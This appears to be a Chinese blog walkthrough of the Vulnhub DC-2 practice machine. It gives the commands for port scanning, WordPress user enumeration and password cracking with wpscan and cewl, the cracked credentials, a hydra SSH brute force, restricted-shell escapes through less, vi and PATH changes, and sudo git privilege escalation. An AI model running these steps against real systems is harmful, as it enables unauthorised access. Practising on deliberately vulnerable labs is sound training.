Vulnhub DC-2

信息收集

arp扫内网
在这里插入图片描述
扫端口

nmap -A -p- -T4 192.168.1.139 -v

在这里插入图片描述
发现端口80和7744(ssh)

直接访问80端口会跳转,导致无法访问
kali修改hosts
在这里插入图片描述

漏洞利用

在这里插入图片描述
成功访问后到flag1

给了提示要用到cewl,cewl kali自带,用于爬行网站生成弱密码

cewl http://dc-2/ -w dc-2.txt

但是不知道用户名,先留着,
这里是wordpress框架,用wpscan(kali自带)爆出用户名

wpscan --url dc-2 -e u

在这里插入图片描述
爆出三个用户,在用cewl生成的字典进行密码爆破

wpscan --url http://dc-2 -P dc-2.txt -U admin

爆出来两个

tom/parturient jerry/adipiscing

dirb 扫目录

dirb http://dc-2

访问会直接跳转登录,拿上面账号登录
http://dc-2/wp-admin/user/

tom登录没东西
拿jerry登录

找到flag2
在这里插入图片描述
有个ssh,尝试爆破ssh

hydra -l tom -P dc-2.txt 192.168.1.139 ssh -s 7744 -V -t 5

在这里插入图片描述
jerry爆破失败

tom登录成功,不能用cat
在这里插入图片描述
命令执行绕过
最终发现只能用less
在这里插入图片描述

看到提示
在这里插入图片描述
发现有个su,用su登录jerry,这里也不知道为啥,jerry有密码但却不能爆破成功
其实做多了就知道flag在用户目录下
在这里插入图片描述
还是照着提示来,su不能用,要进行绕过

新东西

shell绕过限制

shell绕过限制学习
这里用修改环境变量的方法

export PATH=$PATH:/bin/   
export PATH=$PATH:/usr/bin

当然看到别的wp里还有别的手法,我个人没试出来

可使用less绕过:$less test    然后!'sh'
使用ls绕过:$man ls    然后!'sh'
使用vi绕过:$vi test    然后:!/bin/sh 或者 :!/bin/bash

即可绕过,然后flag4在jerry用户目录下
在这里插入图片描述

提权

提示提到了git,搜索git提权

切换jerry登录

sudo git help config
sudo git -p help
sudo git -p --help

成功提权
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值